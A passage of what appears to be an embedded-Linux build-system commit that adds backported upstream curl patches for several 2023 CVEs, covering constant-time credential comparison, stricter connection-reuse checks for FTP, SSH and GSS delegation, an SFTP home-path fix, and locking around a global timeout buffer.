10Upstream-Status: Backport from [https://github.com/curl/curl/commit/4e2b52b5f7a3bf50a0f1494155717b02cc1df6d6]
11
12Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
13Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
14---
15 lib/curl_path.c | 2 +-
16 1 file changed, 1 insertion(+), 1 deletion(-)
17
18diff --git a/lib/curl_path.c b/lib/curl_path.c
19index 40b92ee..598c5dd 100644
20--- a/lib/curl_path.c
21+++ b/lib/curl_path.c
22@@ -60,7 +60,7 @@ CURLcode Curl_getworkingpath(struct connectdata *conn,
23 memcpy(real_path, working_path, 1 + working_path_len);
24 }
25 else if(conn->handler->protocol & CURLPROTO_SFTP) {
26- if((working_path_len > 1) && (working_path[1] == '~')) {
27+ if((working_path_len > 2) && !memcmp(working_path, "/~/", 3)) {
28 size_t homelen = strlen(homedir);
29 real_path = malloc(homelen + working_path_len + 1);
30 if(real_path == NULL) {
31--
322.24.4
33
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
new file mode 100644
index 0000000000..034b72f7e6
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535-pre1.patch
@@ -0,0 +1,236 @@
1From ed5095ed94281989e103c72e032200b83be37878 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Thu, 6 Oct 2022 00:49:10 +0200
4Subject: [PATCH] strcase: add and use Curl_timestrcmp
5
6This is a strcmp() alternative function for comparing "secrets",
7designed to take the same time no matter the content to not leak
8match/non-match info to observers based on how fast it is.
9
10The time this function takes is only a function of the shortest input
11string.
12
13Reported-by: Trail of Bits
14
15Closes #9658
16
17Upstream-Status: Backport from [https://github.com/curl/curl/commit/ed5095ed94281989e103c72e032200b83be37878 & https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
18Comment: to backport fix for CVE-2023-27535, add function Curl_timestrcmp.
19Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
20---
21 lib/netrc.c | 6 +++---
22 lib/strcase.c | 22 ++++++++++++++++++++++
23 lib/strcase.h | 1 +
24 lib/url.c | 33 +++++++++++++--------------------
25 lib/vauth/digest_sspi.c | 4 ++--
26 lib/vtls/vtls.c | 21 ++++++++++++++++++++-
27 6 files changed, 61 insertions(+), 26 deletions(-)
28
29diff --git a/lib/netrc.c b/lib/netrc.c
30index 9323913..fe3fd1e 100644
31--- a/lib/netrc.c
32+++ b/lib/netrc.c
33@@ -124,9 +124,9 @@ static int parsenetrc(const char *host,
34 /* we are now parsing sub-keywords concerning "our" host */
35 if(state_login) {
36 if(specific_login) {
37- state_our_login = strcasecompare(login, tok);
38+ state_our_login = !Curl_timestrcmp(login, tok);
39 }
40- else if(!login || strcmp(login, tok)) {
41+ else if(!login || Curl_timestrcmp(login, tok)) {
42 if(login_alloc) {
43 free(login);
44 login_alloc = FALSE;
45@@ -142,7 +142,7 @@ static int parsenetrc(const char *host,
46 }
47 else if(state_password) {
48 if((state_our_login || !specific_login)
49- && (!password || strcmp(password, tok))) {
50+ && (!password || Curl_timestrcmp(password, tok))) {
51 if(password_alloc) {
52 free(password);
53 password_alloc = FALSE;
54diff --git a/lib/strcase.c b/lib/strcase.c
55index 70bf21c..ec776b3 100644
56--- a/lib/strcase.c
57+++ b/lib/strcase.c
58@@ -261,6 +261,28 @@ bool Curl_safecmp(char *a, char *b)
59 return !a && !b;
60 }
61
62+/*
63+ * Curl_timestrcmp() returns 0 if the two strings are identical. The time this
64+ * function spends is a function of the shortest string, not of the contents.
65+ */
66+int Curl_timestrcmp(const char *a, const char *b)
67+{
68+ int match = 0;
69+ int i = 0;
70+
71+ if(a && b) {
72+ while(1) {
73+ match |= a[i]^b[i];
74+ if(!a[i] || !b[i])
75+ break;
76+ i++;
77+ }
78+ }
79+ else
80+ return a || b;
81+ return match;
82+}
83+
84 /* --- public functions --- */
85
86 int curl_strequal(const char *first, const char *second)
87diff --git a/lib/strcase.h b/lib/strcase.h
88index 8929a53..8077108 100644
89--- a/lib/strcase.h
90+++ b/lib/strcase.h
91@@ -49,5 +49,6 @@ void Curl_strntoupper(char *dest, const char *src, size_t n);
92 void Curl_strntolower(char *dest, const char *src, size_t n);
93
94 bool Curl_safecmp(char *a, char *b);
95+int Curl_timestrcmp(const char *first, const char *second);
96
97 #endif /* HEADER_CURL_STRCASE_H */
98diff --git a/lib/url.c b/lib/url.c
99index 9f14a7b..dfbde3b 100644
100--- a/lib/url.c
101+++ b/lib/url.c
102@@ -886,19 +886,10 @@ socks_proxy_info_matches(const struct proxy_info* data,
103 /* the user information is case-sensitive
104 or at least it is not defined as case-insensitive
105 see https://tools.ietf.org/html/rfc3986#section-3.2.1 */
106- if((data->user == NULL) != (needle->user == NULL))
107- return FALSE;
108- /* curl_strequal does a case insentive comparison, so do not use it here! */
109- if(data->user &&
110- needle->user &&
111- strcmp(data->user, needle->user) != 0)
112- return FALSE;
113- if((data->passwd == NULL) != (needle->passwd == NULL))
114- return FALSE;
115+
116 /* curl_strequal does a case insentive comparison, so do not use it here! */
117- if(data->passwd &&
118- needle->passwd &&
119- strcmp(data->passwd, needle->passwd) != 0)
120+ if(Curl_timestrcmp(data->user, needle->user) ||
121+ Curl_timestrcmp(data->passwd, needle->passwd))
122 return FALSE;
123 return TRUE;
124 }
125@@ -1257,10 +1248,10 @@ ConnectionExists(struct Curl_easy *data,
126 if(!(needle->handler->flags & PROTOPT_CREDSPERREQUEST)) {
127 /* This protocol requires credentials per connection,
128 so verify that we're using the same name and password as well */
129- if(strcmp(needle->user, check->user) ||
130- strcmp(needle->passwd, check->passwd) ||
131- !Curl_safecmp(needle->sasl_authzid, check->sasl_authzid) ||
132- !Curl_safecmp(needle->oauth_bearer, check->oauth_bearer)) {
133+ if(Curl_timestrcmp(needle->user, check->user) ||
134+ Curl_timestrcmp(needle->passwd, check->passwd) ||
135+ Curl_timestrcmp(needle->sasl_authzid, check->sasl_authzid) ||
136+ Curl_timestrcmp(needle->oauth_bearer, check->oauth_bearer)) {
137 /* one of them was different */
138 continue;
139 }
140@@ -1326,8 +1317,8 @@ ConnectionExists(struct Curl_easy *data,
141 possible. (Especially we must not reuse the same connection if
142 partway through a handshake!) */
143 if(wantNTLMhttp) {
144- if(strcmp(needle->user, check->user) ||
145- strcmp(needle->passwd, check->passwd)) {
146+ if(Curl_timestrcmp(needle->user, check->user) ||
147+ Curl_timestrcmp(needle->passwd, check->passwd)) {
148
149 /* we prefer a credential match, but this is at least a connection
150 that can be reused and "upgraded" to NTLM */
151@@ -1348,8 +1339,10 @@ ConnectionExists(struct Curl_easy *data,
152 if(!check->http_proxy.user || !check->http_proxy.passwd)
153 continue;
154
155- if(strcmp(needle->http_proxy.user, check->http_proxy.user) ||
156- strcmp(needle->http_proxy.passwd, check->http_proxy.passwd))
157+ if(Curl_timestrcmp(needle->http_proxy.user,
158+ check->http_proxy.user) ||
159+ Curl_timestrcmp(needle->http_proxy.passwd,
160+ check->http_proxy.passwd))
161 continue;
162 }
163 else if(check->proxy_ntlm_state != NTLMSTATE_NONE) {
164diff --git a/lib/vauth/digest_sspi.c b/lib/vauth/digest_sspi.c
165index a109056..3986386 100644
166--- a/lib/vauth/digest_sspi.c
167+++ b/lib/vauth/digest_sspi.c
168@@ -450,8 +450,8 @@ CURLcode Curl_auth_create_digest_http_message(struct Curl_easy *data,
169 has changed then delete that context. */
170 if((userp && !digest->user) || (!userp && digest->user) ||
171 (passwdp && !digest->passwd) || (!passwdp && digest->passwd) ||
172- (userp && digest->user && strcmp(userp, digest->user)) ||
173- (passwdp && digest->passwd && strcmp(passwdp, digest->passwd))) {
174+ (userp && digest->user && Curl_timestrcmp(userp, digest->user)) ||
175+ (passwdp && digest->passwd && Curl_timestrcmp(passwdp, digest->passwd))) {
176 if(digest->http_context) {
177 s_pSecFn->DeleteSecurityContext(digest->http_context);
178 Curl_safefree(digest->http_context);
179diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
180index e8cb70f..70a9391 100644
181--- a/lib/vtls/vtls.c
182+++ b/lib/vtls/vtls.c
183@@ -98,9 +98,15 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
184 Curl_safecmp(data->issuercert, needle->issuercert) &&
185 Curl_safecmp(data->clientcert, needle->clientcert) &&
186 Curl_safecmp(data->random_file, needle->random_file) &&
187- Curl_safecmp(data->egdsocket, needle->egdsocket) &&
188+ Curl_safecmp(data->egdsocket, needle->egdsocket) &&
189+#ifdef USE_TLS_SRP
190+ !Curl_timestrcmp(data->username, needle->username) &&
191+ !Curl_timestrcmp(data->password, needle->password) &&
192+ (data->authtype == needle->authtype) &&
193+#endif
194 Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
195 Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
196+ Curl_safe_strcasecompare(data->CRLfile, needle->CRLfile) &&
197 Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
198 return TRUE;
199
200@@ -117,6 +123,9 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
201 dest->verifyhost = source->verifyhost;
202 dest->verifystatus = source->verifystatus;
203 dest->sessionid = source->sessionid;
204+#ifdef USE_TLS_SRP
205+ dest->authtype = source->authtype;
206+#endif
207
208 CLONE_STRING(CApath);
209 CLONE_STRING(CAfile);
210@@ -127,6 +136,11 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
211 CLONE_STRING(cipher_list);
212 CLONE_STRING(cipher_list13);
213 CLONE_STRING(pinned_key);
214+ CLONE_STRING(CRLfile);
215+#ifdef USE_TLS_SRP
216+ CLONE_STRING(username);
217+ CLONE_STRING(password);
218+#endif
219
220 return TRUE;
221 }
222@@ -142,6 +156,11 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
223 Curl_safefree(sslc->cipher_list);
224 Curl_safefree(sslc->cipher_list13);
225 Curl_safefree(sslc->pinned_key);
226+ Curl_safefree(sslc->CRLfile);
227+#ifdef USE_TLS_SRP
228+ Curl_safefree(sslc->username);
229+ Curl_safefree(sslc->password);
230+#endif
231 }
232
233 #ifdef USE_SSL
234--
2352.25.1
236
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27535.patch b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
new file mode 100644
index 0000000000..e38390a57c
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27535.patch
@@ -0,0 +1,170 @@
1From 8f4608468b890dce2dad9f91d5607ee7e9c1aba1 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Thu, 9 Mar 2023 17:47:06 +0100
4Subject: [PATCH] ftp: add more conditions for connection reuse
5
6Reported-by: Harry Sintonen
7Closes #10730
8
9Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/curl/tree/debian/patches/CVE-2023-27535.patch?h=ubuntu/focal-security
10Upstream commit https://github.com/curl/curl/commit/8f4608468b890dce2dad9f91d5607ee7e9c1aba1]
11CVE: CVE-2023-27535
12Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
13---
14 lib/ftp.c | 30 ++++++++++++++++++++++++++++--
15 lib/ftp.h | 5 +++++
16 lib/setopt.c | 2 +-
17 lib/url.c | 16 +++++++++++++++-
18 lib/urldata.h | 4 ++--
19 5 files changed, 51 insertions(+), 6 deletions(-)
20
21diff --git a/lib/ftp.c b/lib/ftp.c
22index 31a34e8..7a82a74 100644
23--- a/lib/ftp.c
24+++ b/lib/ftp.c
25@@ -4059,6 +4059,10 @@ static CURLcode ftp_disconnect(struct connectdata *conn, bool dead_connection)
26 }
27
28 freedirs(ftpc);
29+ free(ftpc->account);
30+ ftpc->account = NULL;
31+ free(ftpc->alternative_to_user);
32+ ftpc->alternative_to_user = NULL;
33 free(ftpc->prevpath);
34 ftpc->prevpath = NULL;
35 free(ftpc->server_os);
36@@ -4326,11 +4330,31 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
37 struct Curl_easy *data = conn->data;
38 char *type;
39 struct FTP *ftp;
40+ struct ftp_conn *ftpc = &conn->proto.ftpc;
41
42- conn->data->req.protop = ftp = calloc(sizeof(struct FTP), 1);
43+ ftp = calloc(sizeof(struct FTP), 1);
44 if(NULL == ftp)
45 return CURLE_OUT_OF_MEMORY;
46
47+ /* clone connection related data that is FTP specific */
48+ if(data->set.str[STRING_FTP_ACCOUNT]) {
49+ ftpc->account = strdup(data->set.str[STRING_FTP_ACCOUNT]);
50+ if(!ftpc->account) {
51+ free(ftp);
52+ return CURLE_OUT_OF_MEMORY;
53+ }
54+ }
55+ if(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]) {
56+ ftpc->alternative_to_user =
57+ strdup(data->set.str[STRING_FTP_ALTERNATIVE_TO_USER]);
58+ if(!ftpc->alternative_to_user) {
59+ Curl_safefree(ftpc->account);
60+ free(ftp);
61+ return CURLE_OUT_OF_MEMORY;
62+ }
63+ }
64+ conn->data->req.protop = ftp;
65+
66 ftp->path = &data->state.up.path[1]; /* don't include the initial slash */
67
68 /* FTP URLs support an extension like ";type=<typecode>" that
69@@ -4366,7 +4390,9 @@ static CURLcode ftp_setup_connection(struct connectdata *conn)
70 /* get some initial data into the ftp struct */
71 ftp->transfer = FTPTRANSFER_BODY;
72 ftp->downloadsize = 0;
73- conn->proto.ftpc.known_filesize = -1; /* unknown size for now */
74+ ftpc->known_filesize = -1; /* unknown size for now */
75+ ftpc->use_ssl = data->set.use_ssl;
76+ ftpc->ccc = data->set.ftp_ccc;
77
78 return CURLE_OK;
79 }
80diff --git a/lib/ftp.h b/lib/ftp.h
81index 984347f..163dcb3 100644
82--- a/lib/ftp.h
83+++ b/lib/ftp.h
84@@ -116,6 +116,8 @@ struct FTP {
85 struct */
86 struct ftp_conn {
87 struct pingpong pp;
88+ char *account;
89+ char *alternative_to_user;
90 char *entrypath; /* the PWD reply when we logged on */
91 char **dirs; /* realloc()ed array for path components */
92 int dirdepth; /* number of entries used in the 'dirs' array */
93@@ -141,6 +143,9 @@ struct ftp_conn {
94 ftpstate state; /* always use ftp.c:state() to change state! */
95 ftpstate state_saved; /* transfer type saved to be reloaded after
96 data connection is established */
97+ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
98+ IMAP or POP3 or others! (type: curl_usessl)*/
99+ unsigned char ccc; /* ccc level for this connection */
100 curl_off_t retr_size_saved; /* Size of retrieved file saved */
101 char *server_os; /* The target server operating system. */
102 curl_off_t known_filesize; /* file size is different from -1, if wildcard
103diff --git a/lib/setopt.c b/lib/setopt.c
104index 4d96f6b..a91bb70 100644
105--- a/lib/setopt.c
106+++ b/lib/setopt.c
107@@ -2126,7 +2126,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
108 arg = va_arg(param, long);
109 if((arg < CURLUSESSL_NONE) || (arg >= CURLUSESSL_LAST))
110 return CURLE_BAD_FUNCTION_ARGUMENT;
111- data->set.use_ssl = (curl_usessl)arg;
112+ data->set.use_ssl = (unsigned char)arg;
113 break;
114
115 case CURLOPT_SSL_OPTIONS:
116diff --git a/lib/url.c b/lib/url.c
117index dfbde3b..f84375c 100644
118--- a/lib/url.c
119+++ b/lib/url.c
120@@ -1257,10 +1257,24 @@ ConnectionExists(struct Curl_easy *data,
121 }
122 }
123
124- if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
125+#ifdef USE_SSH
126+ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
127 if(!ssh_config_matches(needle, check))
128 continue;
129 }
130+#endif
131+#ifndef CURL_DISABLE_FTP
132+ else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_FTP) {
133+ /* Also match ACCOUNT, ALTERNATIVE-TO-USER, USE_SSL and CCC options */
134+ if(Curl_timestrcmp(needle->proto.ftpc.account,
135+ check->proto.ftpc.account) ||
136+ Curl_timestrcmp(needle->proto.ftpc.alternative_to_user,
137+ check->proto.ftpc.alternative_to_user) ||
138+ (needle->proto.ftpc.use_ssl != check->proto.ftpc.use_ssl) ||
139+ (needle->proto.ftpc.ccc != check->proto.ftpc.ccc))
140+ continue;
141+ }
142+#endif
143
144 if(!needle->bits.httpproxy || (needle->handler->flags&PROTOPT_SSL) ||
145 needle->bits.tunnel_proxy) {
146diff --git a/lib/urldata.h b/lib/urldata.h
147index 168f874..51b793b 100644
148--- a/lib/urldata.h
149+++ b/lib/urldata.h
150@@ -1730,8 +1730,6 @@ struct UserDefined {
151 void *ssh_keyfunc_userp; /* custom pointer to callback */
152 enum CURL_NETRC_OPTION
153 use_netrc; /* defined in include/curl.h */
154- curl_usessl use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
155- IMAP or POP3 or others! */
156 long new_file_perms; /* Permissions to use when creating remote files */
157 long new_directory_perms; /* Permissions to use when creating remote dirs */
158 long ssh_auth_types; /* allowed SSH auth types */
159@@ -1851,6 +1849,8 @@ struct UserDefined {
160 BIT(http09_allowed); /* allow HTTP/0.9 responses */
161 BIT(mail_rcpt_allowfails); /* allow RCPT TO command to fail for some
162 recipients */
163+ unsigned char use_ssl; /* if AUTH TLS is to be attempted etc, for FTP or
164+ IMAP or POP3 or others! (type: curl_usessl)*/
165 };
166
167 struct Names {
168--
1692.25.1
170
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27536.patch b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
new file mode 100644
index 0000000000..b04a77de25
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27536.patch
@@ -0,0 +1,55 @@
1From cb49e67303dbafbab1cebf4086e3ec15b7d56ee5 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Fri, 10 Mar 2023 09:22:43 +0100
4Subject: [PATCH] url: only reuse connections with same GSS delegation
5
6Reported-by: Harry Sintonen
7Closes #10731
8
9Upstream-Status: Backport [https://github.com/curl/curl/commit/cb49e67303dbafbab1cebf4086e3ec15b7d56ee5]
10CVE: CVE-2023-27536
11Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
12---
13 lib/url.c | 6 ++++++
14 lib/urldata.h | 1 +
15 2 files changed, 7 insertions(+)
16
17diff --git a/lib/url.c b/lib/url.c
18index f84375c..87f4eb0 100644
19--- a/lib/url.c
20+++ b/lib/url.c
21@@ -1257,6 +1257,11 @@ ConnectionExists(struct Curl_easy *data,
22 }
23 }
24
25+ /* GSS delegation differences do not actually affect every connection
26+ and auth method, but this check takes precaution before efficiency */
27+ if(needle->gssapi_delegation != check->gssapi_delegation)
28+ continue;
29+
30 #ifdef USE_SSH
31 else if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
32 if(!ssh_config_matches(needle, check))
33@@ -1708,6 +1713,7 @@ static struct connectdata *allocate_conn(struct Curl_easy *data)
34 conn->fclosesocket = data->set.fclosesocket;
35 conn->closesocket_client = data->set.closesocket_client;
36 conn->lastused = Curl_now(); /* used now */
37+ conn->gssapi_delegation = data->set.gssapi_delegation;
38
39 return conn;
40 error:
41diff --git a/lib/urldata.h b/lib/urldata.h
42index 51b793b..b8a611b 100644
43--- a/lib/urldata.h
44+++ b/lib/urldata.h
45@@ -1118,6 +1118,7 @@ struct connectdata {
46 handle */
47 BIT(sock_accepted); /* TRUE if the SECONDARYSOCKET was created with
48 accept() */
49+ long gssapi_delegation; /* inherited from set.gssapi_delegation */
50 };
51
52 /* The end of connectdata. */
53--
542.25.1
55
diff --git a/meta/recipes-support/curl/curl/CVE-2023-27538.patch b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
new file mode 100644
index 0000000000..6c40989d3b
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-27538.patch
@@ -0,0 +1,31 @@
1From af369db4d3833272b8ed443f7fcc2e757a0872eb Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Fri, 10 Mar 2023 08:22:51 +0100
4Subject: [PATCH] url: fix the SSH connection reuse check
5
6Reported-by: Harry Sintonen
7Closes #10735
8
9CVE: CVE-2023-27538
10Upstream-Status: Backport [https://github.com/curl/curl/commit/af369db4d3833272b8ed443f7fcc2e757a0872eb]
11Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
12---
13 lib/url.c | 2 +-
14 1 file changed, 1 insertion(+), 1 deletion(-)
15
16diff --git a/lib/url.c b/lib/url.c
17index 8da0245..9f14a7b 100644
18--- a/lib/url.c
19+++ b/lib/url.c
20@@ -1266,7 +1266,7 @@ ConnectionExists(struct Curl_easy *data,
21 }
22 }
23
24- if(get_protocol_family(needle->handler->protocol) == PROTO_FAMILY_SSH) {
25+ if(get_protocol_family(needle->handler->protocol) & PROTO_FAMILY_SSH) {
26 if(!ssh_config_matches(needle, check))
27 continue;
28 }
29--
302.25.1
31
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
new file mode 100644
index 0000000000..eaa6fdc327
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320-fol1.patch
@@ -0,0 +1,197 @@
1From f446258f0269a62289cca0210157cb8558d0edc3 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Tue, 16 May 2023 23:40:42 +0200
4Subject: [PATCH] hostip: include easy_lock.h before using
5 GLOBAL_INIT_IS_THREADSAFE
6
7Since that header file is the only place that define can be defined.
8
9Reported-by: Marc Deslauriers
10
11Follow-up to 13718030ad4b3209
12
13Closes #11121
14
15Upstream-Status: Backport [https://github.com/curl/curl/commit/f446258f0269a62289cca0210157cb8558d0edc3]
16CVE: CVE-2023-28320
17Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
18---
19 lib/easy_lock.h | 109 ++++++++++++++++++++++++++++++++++++++++++++++++
20 lib/hostip.c | 10 ++---
21 lib/hostip.h | 9 ----
22 3 files changed, 113 insertions(+), 15 deletions(-)
23 create mode 100644 lib/easy_lock.h
24
25diff --git a/lib/easy_lock.h b/lib/easy_lock.h
26new file mode 100644
27index 0000000..6399a39
28--- /dev/null
29+++ b/lib/easy_lock.h
30@@ -0,0 +1,109 @@
31+#ifndef HEADER_CURL_EASY_LOCK_H
32+#define HEADER_CURL_EASY_LOCK_H
33+/***************************************************************************
34+ * _ _ ____ _
35+ * Project ___| | | | _ \| |
36+ * / __| | | | |_) | |
37+ * | (__| |_| | _ <| |___
38+ * \___|\___/|_| \_\_____|
39+ *
40+ * Copyright (C) Daniel Stenberg, <daniel@haxx.se>, et al.
41+ *
42+ * This software is licensed as described in the file COPYING, which
43+ * you should have received as part of this distribution. The terms
44+ * are also available at https://curl.se/docs/copyright.html.
45+ *
46+ * You may opt to use, copy, modify, merge, publish, distribute and/or sell
47+ * copies of the Software, and permit persons to whom the Software is
48+ * furnished to do so, under the terms of the COPYING file.
49+ *
50+ * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
51+ * KIND, either express or implied.
52+ *
53+ * SPDX-License-Identifier: curl
54+ *
55+ ***************************************************************************/
56+
57+#include "curl_setup.h"
58+
59+#define GLOBAL_INIT_IS_THREADSAFE
60+
61+#if defined(_WIN32_WINNT) && _WIN32_WINNT >= 0x600
62+
63+#ifdef __MINGW32__
64+#ifndef __MINGW64_VERSION_MAJOR
65+#if (__MINGW32_MAJOR_VERSION < 5) || \
66+ (__MINGW32_MAJOR_VERSION == 5 && __MINGW32_MINOR_VERSION == 0)
67+/* mingw >= 5.0.1 defines SRWLOCK, and slightly different from MS define */
68+typedef PVOID SRWLOCK, *PSRWLOCK;
69+#endif
70+#endif
71+#ifndef SRWLOCK_INIT
72+#define SRWLOCK_INIT NULL
73+#endif
74+#endif /* __MINGW32__ */
75+
76+#define curl_simple_lock SRWLOCK
77+#define CURL_SIMPLE_LOCK_INIT SRWLOCK_INIT
78+
79+#define curl_simple_lock_lock(m) AcquireSRWLockExclusive(m)
80+#define curl_simple_lock_unlock(m) ReleaseSRWLockExclusive(m)
81+
82+#elif defined(HAVE_ATOMIC) && defined(HAVE_STDATOMIC_H)
83+#include <stdatomic.h>
84+#if defined(HAVE_SCHED_YIELD)
85+#include <sched.h>
86+#endif
87+
88+#define curl_simple_lock atomic_int
89+#define CURL_SIMPLE_LOCK_INIT 0
90+
91+/* a clang-thing */
92+#ifndef __has_builtin
93+#define __has_builtin(x) 0
94+#endif
95+
96+#ifndef __INTEL_COMPILER
97+/* The Intel compiler tries to look like GCC *and* clang *and* lies in its
98+ __has_builtin() function, so override it. */
99+
100+/* if GCC on i386/x86_64 or if the built-in is present */
101+#if ( (defined(__GNUC__) && !defined(__clang__)) && \
102+ (defined(__i386__) || defined(__x86_64__))) || \
103+ __has_builtin(__builtin_ia32_pause)
104+#define HAVE_BUILTIN_IA32_PAUSE
105+#endif
106+
107+#endif
108+
109+static inline void curl_simple_lock_lock(curl_simple_lock *lock)
110+{
111+ for(;;) {
112+ if(!atomic_exchange_explicit(lock, true, memory_order_acquire))
113+ break;
114+ /* Reduce cache coherency traffic */
115+ while(atomic_load_explicit(lock, memory_order_relaxed)) {
116+ /* Reduce load (not mandatory) */
117+#ifdef HAVE_BUILTIN_IA32_PAUSE
118+ __builtin_ia32_pause();
119+#elif defined(__aarch64__)
120+ __asm__ volatile("yield" ::: "memory");
121+#elif defined(HAVE_SCHED_YIELD)
122+ sched_yield();
123+#endif
124+ }
125+ }
126+}
127+
128+static inline void curl_simple_lock_unlock(curl_simple_lock *lock)
129+{
130+ atomic_store_explicit(lock, false, memory_order_release);
131+}
132+
133+#else
134+
135+#undef GLOBAL_INIT_IS_THREADSAFE
136+
137+#endif
138+
139+#endif /* HEADER_CURL_EASY_LOCK_H */
140diff --git a/lib/hostip.c b/lib/hostip.c
141index 5231a74..d5bf881 100644
142--- a/lib/hostip.c
143+++ b/lib/hostip.c
144@@ -68,6 +68,8 @@
145 #include "curl_memory.h"
146 #include "memdebug.h"
147
148+#include "easy_lock.h"
149+
150 #if defined(CURLRES_SYNCH) && \
151 defined(HAVE_ALARM) && \
152 defined(SIGALRM) && \
153@@ -77,10 +79,6 @@
154 #define USE_ALARM_TIMEOUT
155 #endif
156
157-#ifdef USE_ALARM_TIMEOUT
158-#include "easy_lock.h"
159-#endif
160-
161 #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
162
163 /*
164@@ -259,8 +257,8 @@ void Curl_hostcache_prune(struct Curl_easy *data)
165 /* Beware this is a global and unique instance. This is used to store the
166 return address that we can jump back to from inside a signal handler. This
167 is not thread-safe stuff. */
168-sigjmp_buf curl_jmpenv;
169-curl_simple_lock curl_jmpenv_lock;
170+static sigjmp_buf curl_jmpenv;
171+static curl_simple_lock curl_jmpenv_lock;
172 #endif
173
174 /* lookup address, returns entry if found and not stale */
175diff --git a/lib/hostip.h b/lib/hostip.h
176index baf1e58..d7f73d9 100644
177--- a/lib/hostip.h
178+++ b/lib/hostip.h
179@@ -196,15 +196,6 @@ Curl_cache_addr(struct Curl_easy *data, Curl_addrinfo *addr,
180 #define CURL_INADDR_NONE INADDR_NONE
181 #endif
182
183-#ifdef HAVE_SIGSETJMP
184-/* Forward-declaration of variable defined in hostip.c. Beware this
185- * is a global and unique instance. This is used to store the return
186- * address that we can jump back to from inside a signal handler.
187- * This is not thread-safe stuff.
188- */
189-extern sigjmp_buf curl_jmpenv;
190-#endif
191-
192 /*
193 * Function provided by the resolver backend to set DNS servers to use.
194 */
195--
1962.25.1
197
diff --git a/meta/recipes-support/curl/curl/CVE-2023-28320.patch b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
new file mode 100644
index 0000000000..0c9b67440a
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2023-28320.patch
@@ -0,0 +1,86 @@
1From 13718030ad4b3209a7583b4f27f683cd3a6fa5f2 Mon Sep 17 00:00:00 2001
2From: Harry Sintonen <sintonen@iki.fi>
3Date: Tue, 25 Apr 2023 09:22:26 +0200
4Subject: [PATCH] hostip: add locks around use of global buffer for alarm()
5
6When building with the sync name resolver and timeout ability we now
7require thread-safety to be present to enable it.
8
9Closes #11030
10
11Upstream-Status: Backport [https://github.com/curl/curl/commit/13718030ad4b3209a7583b4f27f683cd3a6fa5f2]
12CVE: CVE-2023-28320
13Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
14---
15 lib/hostip.c | 19 +++++++++++++++----
16 1 file changed, 15 insertions(+), 4 deletions(-)
17
18diff --git a/lib/hostip.c b/lib/hostip.c
19index f5bb634..5231a74 100644
20--- a/lib/hostip.c
21+++ b/lib/hostip.c
22@@ -68,12 +68,19 @@
23 #include "curl_memory.h"
24 #include "memdebug.h"
25
26-#if defined(CURLRES_SYNCH) && \
27- defined(HAVE_ALARM) && defined(SIGALRM) && defined(HAVE_SIGSETJMP)
28+#if defined(CURLRES_SYNCH) && \
29+ defined(HAVE_ALARM) && \
30+ defined(SIGALRM) && \
31+ defined(HAVE_SIGSETJMP) && \
32+ defined(GLOBAL_INIT_IS_THREADSAFE)
33 /* alarm-based timeouts can only be used with all the dependencies satisfied */
34 #define USE_ALARM_TIMEOUT
35 #endif
36
37+#ifdef USE_ALARM_TIMEOUT
38+#include "easy_lock.h"
39+#endif
40+
41 #define MAX_HOSTCACHE_LEN (255 + 7) /* max FQDN + colon + port number + zero */
42
43 /*
44@@ -248,11 +255,12 @@ void Curl_hostcache_prune(struct Curl_easy *data)
45 Curl_share_unlock(data, CURL_LOCK_DATA_DNS);
46 }
47
48-#ifdef HAVE_SIGSETJMP
